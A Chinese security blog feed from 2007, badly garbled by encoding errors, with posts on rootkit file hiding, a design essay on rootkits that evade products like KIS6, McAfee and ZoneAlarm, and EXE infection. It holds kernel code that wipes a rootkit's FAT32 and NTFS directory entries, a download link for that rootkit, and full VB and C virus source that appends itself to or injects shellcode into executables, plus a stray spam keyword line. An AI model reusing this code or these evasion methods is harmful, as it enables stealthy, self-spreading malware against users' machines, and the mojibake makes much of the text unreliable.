   在读取磁盘文件信息时每次都是以一个扇区大��（512 bytes�Q�的整数倍进行的�Q�如果不了解相应��L��l�织形式和数据结构，那么感觉��是数据多而繁杂，搜烦效率也很低。但辅以上述�l�构便可快速定位待隐藏文�g�q�进行涂攏V��这里不得不说一句，��法的高效是很重要的�Q�如果采用暴力搜索的方式�Q�那么系�l�BSOD的概率会大大增加�?br>   在FAT32卷上�Q�当AK922搜烦到文件AK922.sys的目录项�Ӟ��其0x0偏移处的文�g名的�W�一个字节置�?0xe5"�Q�即标记为删除。这样即可达到欺骗ark的目的。但��Z��更加隐蔽�Q�不让winhex察觉出来�Q�最好把文�g名全部清0�?br>   处理NTFS��L��微麻烦些�Q�文件记录和索引��w��要抹�q�净�Q�具体实现见代码�Q�这里不再赘�q��?br>
VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)
{
    ULONG i;
    BOOLEAN bIsNtfsIndex;
    BOOLEAN bIsNtfsFile;
    ULONG offset = 0;
    ULONG indexSize = 0;
    PINDEX_ENTRY currIndxEntry = NULL;
    PINDEX_ENTRY preIndxEntry = NULL;
    ULONG currPosition;


    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);
    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);

    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)
    {

        for(i = 0; i < BufLen/0x20; i++)
        {
            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))
            {

                *(PUCHAR)UserBuf        = 0xe5;
                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;

                break;

            }

            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);

        }

    } else if(bIsNtfsFile) {

        //DbgPrint("FILE0...");

        for(i = 0; i < BufLen / FILERECORDSIZE; i++)
        {
            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))
            {
                memset((PVOID)UserBuf, 0, 0x4);
                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);
                break;
            }

            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);

        }

    } else if(bIsNtfsIndex) {

        //DbgPrint("INDX...");
        // Index Entries

        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;
        indexSize = BufLen - offset;
        currPosition = 0;

        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);
        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);

        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)
        {
            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))
            {
                memset((PVOID)currIndxEntry->FileName, 0, 18);

                if(currPosition == 0)
                {
                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;
                    break;
                }

                preIndxEntry->Size += currIndxEntry->Size;

                break;
            }

            currPosition += currIndxEntry->Size;
            preIndxEntry = currIndxEntry;
            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);

        }
    }
}

   水��^有限�Q�欢�q�大家与我交��?br>

参考资料：

[1] - 《NTFS Documentation�?br>[2] - Azy�Q�《IceSword & Rootkit Unhooker驱动��析�?br>
---------

关于AK922(AzyKit)�Q�我写的一个只实现文�g隐藏的RK�Q�可以bypass本文提到的所有ark�?br>Download @ http://www.wiiupload.net/sf/65b4e75ec4

叶子 2007-10-12 11:58 发表评论

实用�U�反��d��防�Mrootkit设计思�\

叶子 — Fri, 12 Oct 2007 03:57:00 GMT
实用�U�反��d��防�Mrootkit设计思�\

作者：白远�?(ID: baiyuanfan, baiyuanfan@163.com, baiyuanfan@hotmail.com)
June 18, 2007

关键字：rootkit�Q�反��d��防�M�Q�网�l�监控，ring0�Q�mcafee8.5i�Q�KIS6�Q�ZoneAlarm Pro�Q�实用��产品��试
目录�Q?br>反主动防御rootkit的��生背景及其必要�?br>反网�l�访问主动防�?br>反API钩子�q�程行�ؓ��d��防�M
反系�l�Notify�q�程行�ؓ��d��防�M
�l�过监控�q�入ring0安装驱动
实用�U�反��d��防�Mrootkit的通用性问�?br>

反主动防御rootkit的��生背景及其必要�?br>        当前随着新型木马�Q�病毒，间谍软�g对网�l�安全的威胁日益加重�Q�传�l�的特征查杀型的安全产品和简单的��包�q��o型防火墙已不能有效保护用��P��因此各大安全公司�U�L��推出自己的主动防御型安全产品�Q�例如卡巴斯基kis6�Q�mcafee8.5i�Q�ZoneAlarm Pro�{�，�q�些产品应对未知的病毒木马都有很好的效果�Q�若非针�Ҏ��的作过设计的木马和rootkit�Q�根本无法穿��其高��别防御。因此，反主动防御技术，作�ؓ矛和盄��另一方，自然被渗透者们提上日程�Q�由于主动防御安全��品的�q�速普及，��Z��不��后门木马被弹框报警，��h��反主动防御能力的rootkit成�ؓ了一�U�必焉��择�?br>

反网�l�访问主动防�?br>        几乎现在每个防火墙都��h��应用�E�序讉K��|�络限制功能。一个未知的�E�序反弹�q�接到外�|�，或者是在本地监听端口，基本上都会引��h��警。而且对系�l�进�E�的行�ؓ也有了比较严格的审查�Q�原先的注射代码到winlogon�{�系�l�进�E�，在向外反弹连接的�Ҏ��Q�很多主动防御��Y仉��会阻止了�?br>        很多防火墙的应用�E�序讉K��|�络限制�Q�都可以通过摘除tcpip.sys上面的过滤驱动，�q�还原tcpip.sys的Dispatch Routines来绕�q�。据�U�这是因为在ndis层次取得�q�程id不方便而导致的。但是如果在一个实用��的rootkit里应用此�Ҏ��则是不智之�D�Q�因为存在部分防火墙�Q�如ZoneAlarm�Q�其ndis�q��o层必��d��tdi�q��o层协同工作，才会放行�|�络�q�接。至于ndis层次的中间层驱动的摘除，和NDIS_OPEN_BLOCK的还原，则是一��不太可能完成的��d��Q�因为无法从原始文�g中读取的�Ҏ��Q�获得NDIS_OPEN_BLOCK的原始��|��即��能够成功恢复ndis钩子�Q�也不能保证�pȝ��可以正常�q�行�Q�很可能会出现各�U�不明症状�?br>        到现在�ؓ止，�l�过应用�E�序讉K��|�络限制最好的选择�Q�还是那两个�Q�简单的一个，注射代码��C��个ie�q�程�Q�用它反弹连接出来，讉K��外网�Q�复杂的选择则是应用内核驱动�Q�如ndis hook/��d��新的ndis protocol�Q�来实现端口复用�Q�或者��用tdi client driver反弹�q�接。已�l�有很多木马和rootkit使用前者，因其��单易行，在实际开发中工程量小�Q�出现问题的可能性也��得多，产品成熟的时间代价也��。但是目前很多的��d��防�M已经注意到这一点，�q�且在程序行为监控中严密防范了其他程序对ie的感染行为�?br>
    如图�Q�想要��用僵��IE讉K��|�络的木马被拦截

反API钩子�q�程行�ؓ��d��防�M
        接下来是��d��防�M�pȝ��的很重要的一部分�Q�进�E�行为监控。该部分��d��防�M软�g一般通过两种解决�Ҏ��来执行，一是API钩子�Q�二是windows支持的notify routine�?br>        大量的主动防御安全��Y�Ӟ��如KIS6�Q�ZoneAlarm Pro�Q��用API钩子来监控进�E�的危险行�ؓ。如注射�q�程�U�程�Q�启动傀儡IE�Q�加载驱动，注册服务�Q�修�Ҏ��感系�l�注册表键值等。但是作��Z��个rootkit�Q�完全绕�q�这些操作，基本上是不可能的�Q�于是摆攑֜�面前的�Q务，��是如何击��|�q�种��d��防�M�?br>        对于特定�U�类的监控，��L��有特定的�Ҏ��可以�l�过。比如注��远�E�线�E�，如果常用的CreateRemoteThread被监控了�Q�可以尝试采用Debug API�Q?SetThreadContext的方法绕�q�，也可以尝试采用hook其ntdll!ZwYieldExecution�{�频�J�调用的函数来装载自��q��DLL模块�?注册表监控，我的朋友xyzreg曄��写过�p�d��文章�Q�提��Z��很多�U�方法，包括RegSaveKey, Hive�~�辑�{�方法绕�q�卡巴斯基的注册表监控，其Hive�~�辑的方法目前仍未能有�Q何主动防御系�l�拦截�?br>        但是从一个通用型，为实战设计的实用型rootkit来说�Q�采用这些特定的技术�ƈ不是一个非常好的选择�Q�因��些技术可以保证对付一个主动防御��Y�Ӟ��却不能保证通用�Q�甚至通用性很差。而且针对每一个可能被��d��防�M拦截的行为，都采用一套特定的�l�过技术，从工�E�代价上来讲�Q�太�q�巨大，开发耗时�Q�等其成熟更是不知道要多��时间来��试和更攏V��因此我们需要的一个相�Ҏ��盖范围广�Q�能够解决绝大多��C��动防御技术的解决�Ҏ��?br>        针对API钩子实现的进�E�行为监控，一个较好的通用解决�Ҏ��是卸蝲所有安全��Y件所安装的API钩子。�ؓ兼容性和�E�_��赯��Q�几乎所有的安全软�g在安装API钩子旉��会选择hook SSDT表，例如KIS6�Q�ZoneAlarm Pro。我们如果能够进入ring0�Q�就可以使用一个驱动程序，��d��pȝ��文�gntoskrnl.exe/ntkrnlpa.exe/ntkrpamp.exe�Q�从中提出我们所希望的SSDT表的原始函数地址�Q�替换被安全软�ghook的地址�Q�用此方法可以通用性很好的解决�l�大多数的API钩子实现的进�E�行为监控。不�q�此�Ҏ��有一个前提，��是事先必须�l�过监控�q�入ring0。关于如何实现此前提�Q�请阅读�W�五部分�Q?#8220;�l�过监控�q�入ring0安装驱动”�?br>
    如图�Q�ZoneAlarm Pro更改了大量的SSDT函数地址来监控程序行为�?br>

反系�l�Notify�q�程行�ؓ��d��防�M
        部分��d��防�M安全软�g不仅仅是用API钩子�Q�同时��用了微��Y提供的Notify Routine�Q�来监视�q�程的行为。��用该技术的安全软�g不是太多�Q�但是也不至于少��C��个实用��别rootkit可以忽略的程度�?br>        以下几个微��YDDK函数�Q�PsSetCreateProcessNotifyRoutine�Q�PsSetCreateThreadNotifyRoutine�Q�PsSetLoadImageNotifyRoutine�Q�被用作支持��d��防�M软�g监控新进�E�的建立�Q�新�U�程的徏立，和一个新的模块被加蝲。处理该�U�类型的防�M不能��单的清空NotifyRoutine��完事，因�ؓ�pȝ��本��n�Q�还有一些第三方正常模块和驱动，可能��d��和��用该链表�?br>        解决�Ҏ��Q�一是可以先��用了该技术的��d��防�M�pȝ��的驱动程序模块做一个列表出来，然后遍历�q�三条链表，扑և�地址指向�q�些驱动模块的项�Q�再��这些项删除脱链。但是这需要对大量��d��防�M�pȝ��的研�I�和��试�Q��ƈ且通用型也不好。第二种�Ҏ��Q�由于Notify Routine的监控力度要�q�弱于API钩子�Q�因此在�U�ring3��程序做一些小的改动，��可以越�q�这�U�类型的监控�?br>        另外�q�有几个SDK函数�Q�可以提供对文�g和注册表的更改的notify。不能排除也有部分主动防御��Y件��用了它们。例如国产的��巡警(AST.exe)�Q��用了RegNotifyChangeKeyValue�Q�做了对注册表敏感键��g��改的事后警告提示。如果仅仅��用了API钩子清除技术，那么在此时就会被AST报警。和以上介绍的三个内核notify�c�M��的也是，有不��正常的notify在被使用�Q�不分青�U�皂白的全部卸蝲�Q�会��D��pȝ��异常�?br>        因此可见�Q�Notify�cȝ��控虽然��用的不多�Q�但是其对付的难度和需要的工程量，比API监控�q�要大�?br>
    如图�Q�已�l�处理了API钩子监控的rootkit仍然被notify方式的AST报警�?br>

�l�过监控�q�入ring0安装驱动
        �q�部分是重中之重。由于几乎每个主动防御系�l�都会监控未知驱动的加蝲和试图进入ring0的�D动，而我们在�W�一�Q�第二和�W�三部分�l�过��d��防�M要做的处理，都必��需要ring0权限。因此监控进入ring0�Q�是一个独立的话题�Q�也是我们实现前三个部分需要的条�g�?br>        直接��d��注册表项�Q�ZwLoadDriver安装驱动�Q�是几乎要被��M��d��防�M�pȝ��报警。必��要采用一些隐蔽的或者是��Z�h不知的方法。�ȝ��目前已经公布出来的进入ring0的办法，
有以下几�U�：
        感染文�g�Q�例如win32k.sys�Q�添加自��q��代码到里面，启动的时候就会被执行。这�U�方法的优点是简单易行，�E�_��度和兼容性很好。但是最大的�~�点��是必须重新启动以后�Q�才能进入ring0�Q�这是一个��品��别的后门所不能容忍的。而且微��Y自己的系�l�文件保护容易绕�q�，mcafee和卡巴斯基的文�g监控可就不是那么�Ҏ��了�?br>        利用物理内存对象�Q�来写入自己的代码到内核�Q��ƈ��d��调用门来执行。这个是最早被人提出的不用驱动�q�入ring0的办法。因为出来的旉��太长了，所以有以下一些问题：更新的操作系�l�内�怸�支持�Q�如2003SP1�Q�很多的��d��防�M�pȝ��会拦截，例如KIS6。所以这个办法也不理惟�?br>        利用ZwSystemDebugControl。这个代码在国外有�h攑և�来过�Q�利用它写内存，挂钩NtVdmControl�Q�进入ring0。此法缺陷在于老的windows2000不被支持�Q�最新的windows2003sp1上也取消了这个函数的此能力。不�q�好处在于，�q�个�Ҏ��用的人少�Q�基本上没有��d��防�M会注意到它，�q�进行拦截�?br>        利用ZwSetSystemInformation的SystemLoadAndCallImage功能号加载一个模块进入ring0。这个方法提出来比较久了�Q�但是因为用的�h��，仍未被主动防御��Y件所重视。用得少的原因是�Q�它不好用。它只能加蝲一个普通的模块到内核�ƈ且调用，却不是加载一个驱动，因此没有一个DriverObject。这��D��了非常多的麻烦。因��想��用这个办法，必须先用�q�个办法安装一个简单的内核模块�Q�再用这个模块添加调用门�{�方式，执行代码清除��d��防�M的监视驱动安装的钩子�Q�安装一个正常的驱动�Q�才能最�l�完成�Q务。而且�q�个�Ҏ��g��对windows2003sp1以上的系�l�也无效�?br>        因此�Q�要��x��一个相对完��的�q�入ring0解决�Ҏ��Q�最好是��L��别�h不知道或者��用很��的�Ҏ��Q�或者将上面的有�~�陷的方法做一个综合，用多�U�方法通过判断情况来选择使用。我在这里有一个新的思�\提供�l�大�Ӟ��微��Y新公布了一部分文��Q�关于HotPatch的��用。HotPatch可以在执行中修改�pȝ��中存在的用户态公用dll的内容，甚至是修改内核模块的内容。具体代码和�l�节�Q�在�q�里我不能多说�?br>        要想开发一个好的反��d��防�Mrootkit�Q�绕�q�监控进入ring0是必不可��的�Q�然而这部分也是使用不成熟技术最多的�Q�最�Ҏ��出现严重问题的部分。作��Z��个负责�Q的实用��产品�Q�一定要对这个部分作做详�l�的��试�Q�来保证自己的��品不会在某些�Ҏ��的环境，比如64位CPU�q�行32位系�l�，多核处理器，HyperThread处理器上面，出现故障或者蓝屏�?br>

实用�U�反��d��防�Mrootkit的通用性问�?br>        前文已述�Q�本文的宗旨在于讨论一�U�实用��别rootkit开发的可行性。因此，工程量的大小�Q�需要投入的人力�Q�时间和金钱�Q�也是我们需要考虑的内宏V��必��要考虑更好的兼�Ҏ��通用性，和工�E�上的开发代价和�E�_��成熟周期不能无限大。因此，对于部分新技术，例如BiosRootkit�Q�VirtualMachine-Rootkit�Q�本文不做讨论，因�ؓ那些都属于如果要惛_��E�_��通用�Q�工�E�代价非常大�Q�以至于他们只拥有技术上面的讨论价��|��而不具备作�ؓ一个��品开发的可选解��x��案的可能性。至��是目前来看是如此�?br>        每个��d��防�M软�g的原理和构造都是不相同的，因此不可能指望有某一�U�方法，从工�E�上可以解决一个主动防御系�l�，��可以无需��试的，保证无误的解军_��他系�l�。因��个原因，开发一个成熟稳定的反主动防御rootkit�Q�必然要在兼容各�U�主动防御的�pȝ��的通用性上面下大功夫。按照不同的��d��防�M�pȝ��Q�在�E�序里switch case�Q�应该是非常必要的，��管�l�大多数反主动防御代码原理上可以通用。基本上�Q�在��试�E�序通用型的时候，常用的主动防御��Y�Ӟ��是每�U�都要安装一个�ƈ且仔�l�测试的�?br>        以下举例说明�Q�几个常用主动防御系�l�各自需要注意的特点�Q�这都是�W�者在实际开发中遇到的比较典型的例子�?br>
Mcafee8.5�Q�该��d��防�M软�g在最大化功能时会��止在系�l�目录下创徏可执行文�Ӟ��光这一点就会让几乎全部rootkit安装��p�|�Q�若非针对它做了设计。在�q�个�pȝ��下面�Q�也不可能��用感染文件的�Ҏ��来进入ring0�?br>KIS6�Q�该�pȝ��会自动列举运行的隐藏�q�程�Q��ƈ且弹框警告。因此在�q�系�l�下�Q�不太可能把自己的进�E�隐藏。而且它列��N��藏进�E�的手段很底层，很难�l�过�?br>ZoneAlarm Pro�Q�该�pȝ��下，如果一个其它的�q�程启动IE�q�且讉K��|�络�Q�安全报警仍然会以该�q�程本��n讉K��|�络为准执行�Q�另外还会弹框警告，除非��自��q��僵尸IE�q�程的父�q�程更改�Q�或者不用IE来反弹连接�?br>国��的瑞星，��M��来说�q�个�pȝ��的主动防御弱于国外��品，但是它特�D�在于，会对IE作出非常严格的限�Ӟ��默认不允许IE装蝲��M��非系�l�的dll。因此在�q�个�pȝ��下基本不可能利用IE反弹�?br>
        其他的特�D�情况还有很多。作��Z��个成熟��品开发者，�q�些都是必须要考虑的�?br>

感谢�Q�VXK�Q�郭宏硕�Q�， xyzreg�Q�张��|��?br>附录�Q�提供几个录像，�Ҏ��文的内容做一个展�C�录像，Rootkit�I�越各种��行的主动防御系�l��?

叶子 2007-10-12 11:57 发表评论

感染EXE

叶子 — Mon, 08 Oct 2007 06:21:00 GMT
攉��两篇感染exe的文章，有时间了把它写出�?br>
VB�Q?br>

Option Explicit
Private Victim As String '要感染的文�g的名�?br>Private HostLen As Long '要感染的文�g的大��?br>Private vbArray() As Byte '病毒的代�?br>Private hArray() As Byte '要感染的文�g的代�?br>Private lenght As Long
Private MySize As Integer '病毒的大��?/p>
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Sub form_Initialize()
Dim i As Long
On Error GoTo vbVerror '出错处理

'原理�Q�将生成病毒文�g的代码读出，�_�在要被感染的文件的后面�?br>Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim MyArray(LOF(1) - 1)
MySize = LOF(1)
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1
'�q�是在读自己的代�?/p>

Victim = Dir(App.Path & "\" & "*.EXE") '随便选一个文�Ӟ��目前只是在病毒所在的目录下随机选一个，��来你可以修改，让它不断的��@环搜索计��机上的所有文件。）
While Victim <> ""

If format(Victim, ">") <> format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1
'��d��病毒自��n的代�?/p>

If hArray(&H69) <> &H4D Then

i = hArray(&H3C)
If hArray(i) = &H50 Then
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If '要保证被感染的不是空文�g�Q�不是圈套）
End If
End If
'��d��准备被感染的文�g的代�?/p>
Victim = Dir() 'Next

Wend

'下面的工作是��Z��保证病毒不会重复感染一个文�Ӟ��也不会自我感染�?/p>
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1

Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
Put #1, , vbArray
Close #1

idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill App.Path & "\" & App.EXEName & ".eve"

Else
Close #1

End If

End

vbVerror: '出错处理�Q�空着��可以了

End Sub

VC�Q?br>
/**************************************************************
* 函数�Q�InjectCode
* 参数�Q�char szHostFile[]--待感染的exe文�g路径

* 功能�Q�感染一个exe�E�序�Q�运行显�C?#8220;金猪拜年”的MessageBox
* 从代码节开始搜�?替换�W�一个发现的call api的指�?br>* 把目标代码插入代码节的尾�?br>* 代码仅供演示之用,没有做过多的错误处理
* 感染当前hello.exe,插入一�D�弹出对话框代码�Q�当然你可以修改成启动文件的代码�Q�嘿嘿）
* coded by robinh00d
* robinh00d_at_163.com
* �~�译:cl epo.c
**************************************************************/
int InjectCode(char szHostFile[])
{//#include
PIMAGE_DOS_HEADER pImageDosHeader ;
PIMAGE_NT_HEADERS pImageNtHeaders ;
PIMAGE_SECTION_HEADER pImageSectionHeader;
unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b"
"\x81\xeb\x0d\x10\x40\x00\x6a\x00"
"\x8d\x83\x30\x10\x40\x00\x50\x50"
"\x6a\x00\xb8\x78\x56\x34\x12\xff"
"\xd0\x9d\x61\xff\x25\x3a\x10\x40"
"\x00\x90\xBD\xF0\xD6\xED\xB0\xDD"
"\xC4\xEA\x00";
HANDLE hFile ;
HANDLE hMap ;
LPVOID pMapping ;
DWORD dwGapSize ;
unsigned char *pGapEntry ;
int i ;
PROC MsgBox ;
DWORD OldEntry ;
int x = 0x18 ;
int vir_len ;
unsigned char *pSearch ;
DWORD *dwCallNextAddr ;
DWORD *dwCallDataOffset ;
DWORD *dwCallDataAddr ;
DWORD dwCallData ;
DWORD dwCodeDistance ;
DWORD *dwJmpAddr ;
DWORD dwJmpData ;
DWORD dwJmpVA ;

//:::
hFile = CreateFile(szHostFile,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL) ;

if (hFile==INVALID_HANDLE_VALUE)
{
return -1 ;
}

hMap = CreateFileMapping(hFile,
NULL,
PAGE_READWRITE,
0,
0,
NULL) ;
if (!hMap)
return -1 ;

pMapping = MapViewOfFile(hMap,
FILE_MAP_ALL_ACCESS,
0,
0,
0) ;
if (!pMapping)
return -1 ;

pImageDosHeader = (PIMAGE_DOS_HEADER)pMapping ;
if (pImageDosHeader->e_magic==IMAGE_DOS_SIGNATURE)
{
pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader->e_lfanew) ;
if (pImageNtHeaders->Signature==IMAGE_NT_SIGNATURE)
{
pImageSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pMapping+
pImageDosHeader->e_lfanew+
sizeof(IMAGE_NT_HEADERS)) ;
dwGapSize = pImageSectionHeader->SizeOfRawData - pImageSectionHeader-

>Misc.VirtualSize ;

if (sizeof(thunkcode)>dwGapSize)
goto Close ;

pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping+
pImageSectionHeader->Misc.VirtualSize) ;

OldEntry = pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;

MsgBox = (PROC)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA") ;

//修改为当前系�l�的MessageBoxA地址
for (i=3;i>=0;i--)
{
thunkcode[i+27] = ((unsigned int)MsgBox>>x)&0xff ;
x -= 8 ;
}
x = 24 ;

vir_len = (int)pImageSectionHeader->Misc.VirtualSize ;

pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping) ;

//:::搜烦call指��o(0xe8)
for (i=0;i {
if (pSearch[i]==0xe8)
{
dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ;
dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ;
dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ;
dwJmpVA = (DWORD)dwJmpAddr-
((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+
pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ;

if ((*dwJmpAddr&0xffff)==0x25ff)
{
dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ;
*dwCallDataAddr = dwCodeDistance ;
for (i=3;i>=0;i--)
{
thunkcode[i+37] = ((unsigned int)dwJmpData>>x)&0xff ;
x -= 8 ;
}
for (i=0;i {
pGapEntry[i] = thunkcode[i] ;
}
break ;
}
}

}

}
}

Close:
UnmapViewOfFile(pMapping) ;
CloseHandle(hMap) ;
CloseHandle(hFile) ;

return 0 ;
}

叶子 2007-10-08 14:21 发表评论

利用NtUnmapViewOfSection强制卸蝲模块

叶子 — Mon, 24 Sep 2007 07:08:00 GMT
��实可以卸蝲指定�q�程指定位置的模块，但有几个问题�Q?br>[1] PEB的模块列表中�q�存在该模块的记录，大部分模块枚丑և�数都是枚举这个列�?br>[2] 可能会出现访问异�?br>
看来RING3下是不可能做到强制卸载模块的完美实现�Q�要�q�ring0才行。下面是��试代码

typedef ULONG (WINAPI *PFNNtUnmapViewOfSection)( IN HANDLE ProcessHandle,IN PVOID BaseAddress );

BOOL UnmapViewOfModule ( DWORD dwProcessId, LPVOID lpBaseAddr )
...{
    HMODULE hModule = GetModuleHandle ( L"ntdll.dll" ) ;
    if ( hModule == NULL )
        hModule = LoadLibrary ( L"ntdll.dll" ) ;

    PFNNtUnmapViewOfSection pfnNtUnmapViewOfSection = (PFNNtUnmapViewOfSection)GetProcAddress ( hModule, "NtUnmapViewOfSection" ) ;

    HANDLE hProcess = OpenProcess ( PROCESS_ALL_ACCESS, TRUE, dwProcessId ) ;
    ULONG    ret = pfnNtUnmapViewOfSection ( hProcess, lpBaseAddr ) ;
    CloseHandle ( hProcess ) ;
    return ret ? false : true ;
}

叶子 2007-09-24 15:08 发表评论

BIOS Rootkit:Welcome home,my Lord!

叶子 — Wed, 23 May 2007 11:35:00 GMT
     摘要:   阅读全文

叶子 2007-05-23 19:35 发表评论

Do all in one exe file Under Win32

叶子 — Wed, 23 May 2007 11:12:00 GMT
     摘要:   阅读全文

叶子 2007-05-23 19:12 发表评论

扭曲变换加密

叶子 — Tue, 15 May 2007 05:17:00 GMT
     摘要:   阅读全文

叶子 2007-05-15 13:17 发表评论

syser 实战一(分析 nprotect �?dump_wmimmc.sys)

叶子 — Sun, 13 May 2007 17:08:00 GMT
     摘要:   阅读全文

叶子 2007-05-14 01:08 发表评论

打造最��的PE文�g

叶子 — Sun, 13 May 2007 16:46:00 GMT
     摘要:   阅读全文

叶子 2007-05-14 00:46 发表评论

叶子 — Sun, 13 May 2007 16:45:00 GMT
     摘要:   阅读全文

叶子 2007-05-14 00:45 发表评论

国产精品一二三四,国产美女精品一区二区三区,亚洲高清在线播放

Linux对稀疏（Sparse�Q�文件的支持

CFileDialog 异常退出的问题

[转]一�D늲�巧的代码~~ring3文�g占坑大法

清空代码防止查看源代�?ZT)

调用未知DLL中的导出函数

实用�U�反��d��防�Mrootkit设计思�\

感染EXE

利用NtUnmapViewOfSection强制卸蝲模块

BIOS Rootkit:Welcome home,my Lord!

Do all in one exe file Under Win32

扭曲变换加密

syser 实战一(分析 nprotect �?dump_wmimmc.sys)

打造最���的PE文�g

打造最��的PE文�g